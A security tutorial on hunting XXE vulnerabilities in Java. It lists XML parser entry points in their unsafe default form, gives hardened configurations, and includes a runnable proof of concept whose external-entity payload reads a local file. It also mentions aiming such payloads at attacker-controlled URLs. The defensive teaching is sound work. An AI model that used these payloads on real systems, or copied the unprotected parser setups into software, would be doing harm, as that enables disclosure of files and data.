Tag archive: Open Source

How to Hunt for XXE Vulnerabilities in Applications Built with Java

Reference

Keywords

DocumentBuilderFactory

DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
DocumentBuilder safebuilder = dbf.newDocumentBuilder();

XPathExpression

DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = df.newDocumentBuilder();
Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes()));
// XPathExpression is an interface; it comes from XPath.compile(), not from new
XPathExpression expr = XPathFactory.newInstance().newXPath().compile(expression);
String result = expr.evaluate(doc);

SAXParserFactory / Unmarshaller

SAXParserFactory spf = SAXParserFactory.newInstance();
Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(new StringReader(xml)));
JAXBContext jc = JAXBContext.newInstance(Object.class);
Unmarshaller um = jc.createUnmarshaller();
um.unmarshal(xmlSource);

XMLInputFactory

XMLInputFactory xif = XMLInputFactory.newFactory();
// not a security property: look for SUPPORT_DTD / IS_SUPPORTING_EXTERNAL_ENTITIES instead
xif.setProperty(XMLInputFactory.IS_NAMESPACE_AWARE, true);

TransformerFactory

TransformerFactory tf = TransformerFactory.newInstance();

Validator

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema();
Validator validator = schema.newValidator();

SchemaFactory

SchemaFactory factory = SchemaFactory.newInstance("http://www.w3.org/2001/XMLSchema");
Schema schema = factory.newSchema(source); // source: a javax.xml.transform.Source holding the XSD

SAXTransformerFactory

// newInstance() is inherited from TransformerFactory, so the result must be cast
SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance();
XMLFilter filter = sf.newXMLFilter(source);

XMLReader

XMLReader reader = XMLReaderFactory.createXMLReader();

SAXReader (dom4j)

SAXBuilder (JDOM)

SAXBuilder builder = new SAXBuilder();
Document doc = builder.build(new File(fileName));
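The keyword list above shows each entry point in its default, unprotected form. For comparison, the following class is an added example (not code from the original post) showing the hardened form of the JDK entry points that the list does not cover with a mitigation: SAXParserFactory (which also feeds JAXB's Unmarshaller through a SAXSource), XMLReader, XMLInputFactory, TransformerFactory / SAXTransformerFactory, and SchemaFactory / Validator. The class and method names are mine; the feature and property names are the real Xerces and javax.xml constants. When hunting, these are the settings you expect to find next to the keyword; if none of them is present, the finding is worth chasing.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.transform.TransformerConfigurationException;
import javax.xml.transform.TransformerFactory;
import javax.xml.validation.SchemaFactory;
import javax.xml.validation.Validator;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

/** Hardened constructors for the JDK XML entry points (illustrative class, not from the post). */
public final class SafeXmlFactories {

    // Xerces feature URIs, honoured by the JDK's built-in parser and by Apache Xerces.
    static final String DISALLOW_DOCTYPE   = "http://apache.org/xml/features/disallow-doctype-decl";
    static final String EXTERNAL_GENERAL   = "http://xml.org/sax/features/external-general-entities";
    static final String EXTERNAL_PARAMETER = "http://xml.org/sax/features/external-parameter-entities";
    static final String LOAD_EXTERNAL_DTD  = "http://apache.org/xml/features/nonvalidating/load-external-dtd";

    /** SAXParserFactory: also the right thing to feed a JAXB Unmarshaller via SAXSource. */
    public static SAXParserFactory saxParserFactory() throws ParserConfigurationException, SAXException {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setFeature(DISALLOW_DOCTYPE, true);     // strongest setting: any DOCTYPE is a parse error
        spf.setFeature(EXTERNAL_GENERAL, false);    // fallbacks if a DOCTYPE must be tolerated
        spf.setFeature(EXTERNAL_PARAMETER, false);
        spf.setFeature(LOAD_EXTERNAL_DTD, false);
        spf.setXIncludeAware(false);
        return spf;
    }

    /** XMLReader: obtain it from the hardened factory instead of XMLReaderFactory. */
    public static XMLReader xmlReader() throws ParserConfigurationException, SAXException {
        XMLReader reader = saxParserFactory().newSAXParser().getXMLReader();
        reader.setFeature(DISALLOW_DOCTYPE, true);  // re-assert on the reader itself
        return reader;
    }

    /** XMLInputFactory (StAX): switch DTD support off, or at least external entities. */
    public static XMLInputFactory xmlInputFactory() {
        XMLInputFactory xif = XMLInputFactory.newFactory();
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return xif;
    }

    /** TransformerFactory (SAXTransformerFactory is a subclass, so the same calls apply). */
    public static TransformerFactory transformerFactory() throws TransformerConfigurationException {
        TransformerFactory tf = TransformerFactory.newInstance();
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");        // "" = no protocol allowed
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    /** SchemaFactory and the Validator it produces: both need the access-external properties. */
    public static Validator validator() throws SAXException {
        SchemaFactory factory = SchemaFactory.newInstance(XMLConstants.W3C_XML_SCHEMA_NS_URI);
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        Validator validator = factory.newSchema().newValidator();
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return validator;
    }

    /** Self-check: a document carrying a DOCTYPE must be rejected by the hardened SAX parser. */
    public static void main(String[] args) throws Exception {
        // Constructed probe; the entity is never resolved because the DOCTYPE itself is refused.
        String probe = "<!DOCTYPE d [<!ENTITY e SYSTEM \"file:///etc/hostname\">]><d>&e;</d>";
        try {
            saxParserFactory().newSAXParser().parse(new InputSource(new StringReader(probe)), new DefaultHandler());
            System.out.println("DOCTYPE accepted: configuration is NOT safe");
        } catch (SAXException e) {
            System.out.println("DOCTYPE rejected: " + e.getMessage());
        }
        xmlReader(); xmlInputFactory(); transformerFactory(); validator();  // must construct without error
    }
}
```

The disallow-doctype-decl feature is the one to look for first: it makes every entity declaration impossible in one step. The external-general-entities / external-parameter-entities pair is the fallback when an application has a legitimate need for an internal DTD, and the XMLConstants.ACCESS_EXTERNAL_* properties are what the Transformer and Schema APIs use instead of SAX features.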

Highlight

If you find any of the keywords listed above and no feature or property has been set to prevent XXE (for example disallow-doctype-decl, external-general-entities and external-parameter-entities set to false, SUPPORT_DTD set to false, or ACCESS_EXTERNAL_DTD set to an empty string), the code is potentially vulnerable to XXE. Trace the invocation chain back to the source of the XML; if the document is attacker-controlled, a proof of concept is usually easy to build.
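To make the hunting rule above concrete, here is an added example (my own code, not from the original post) that plays both roles: the unprotected DocumentBuilderFactory pattern from the keyword list parses a classic in-band XXE payload and hands back the contents of a local file, while the hardened factory beside it rejects the same document before any entity is resolved. The secret file is created by the program itself so the demo runs offline; the class, method and file names are mine.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXException;

/** Minimal XXE PoC against a default DocumentBuilderFactory, next to the hardened form. */
public class XxePoc {

    static final String DISALLOW_DOCTYPE = "http://apache.org/xml/features/disallow-doctype-decl";

    // A secret on disk that the parser should never expose (constructed for this demo).
    static Path writeSecret() throws IOException {
        Path p = Files.createTempFile("xxe-secret", ".txt");
        Files.write(p, "FLAG{local-file-read}".getBytes(StandardCharsets.UTF_8));
        p.toFile().deleteOnExit();
        return p;
    }

    // Classic in-band payload: declare an external entity pointing at a local file,
    // then reference it inside the element the application echoes back.
    static String payload(Path target) {
        return "<?xml version=\"1.0\"?>\n"
             + "<!DOCTYPE data [<!ENTITY xxe SYSTEM \"" + target.toUri() + "\">]>\n"
             + "<data>&xxe;</data>";
    }

    // The pattern the keyword list flags: newInstance() with no security features set.
    static String parseVulnerable(String xml) throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = dbf.newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    // Hardened form: refuse any DOCTYPE, so neither general nor parameter entities can be declared.
    static String parseHardened(String xml) throws ParserConfigurationException, SAXException, IOException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(DISALLOW_DOCTYPE, true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        DocumentBuilder builder = dbf.newDocumentBuilder();
        Document doc = builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        String xml = payload(writeSecret());

        // Vulnerable: the file contents come back as the text of <data>.
        System.out.println("vulnerable parser returned: " + parseVulnerable(xml));

        // Hardened: the parser throws on the DOCTYPE before resolving anything.
        try {
            parseHardened(xml);
            System.out.println("hardened parser returned content (unexpected)");
        } catch (SAXException e) {
            System.out.println("hardened parser rejected the document: " + e.getMessage());
        }
    }
}
```

In a real engagement the payload is the same; what changes is the target of the SYSTEM identifier (a file the application can read, or an attacker-controlled URL for out-of-band confirmation when nothing is echoed back) and the sink through which the document reaches the parser, which is exactly the invocation chain the hunting rule tells you to trace.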

Acknowledgement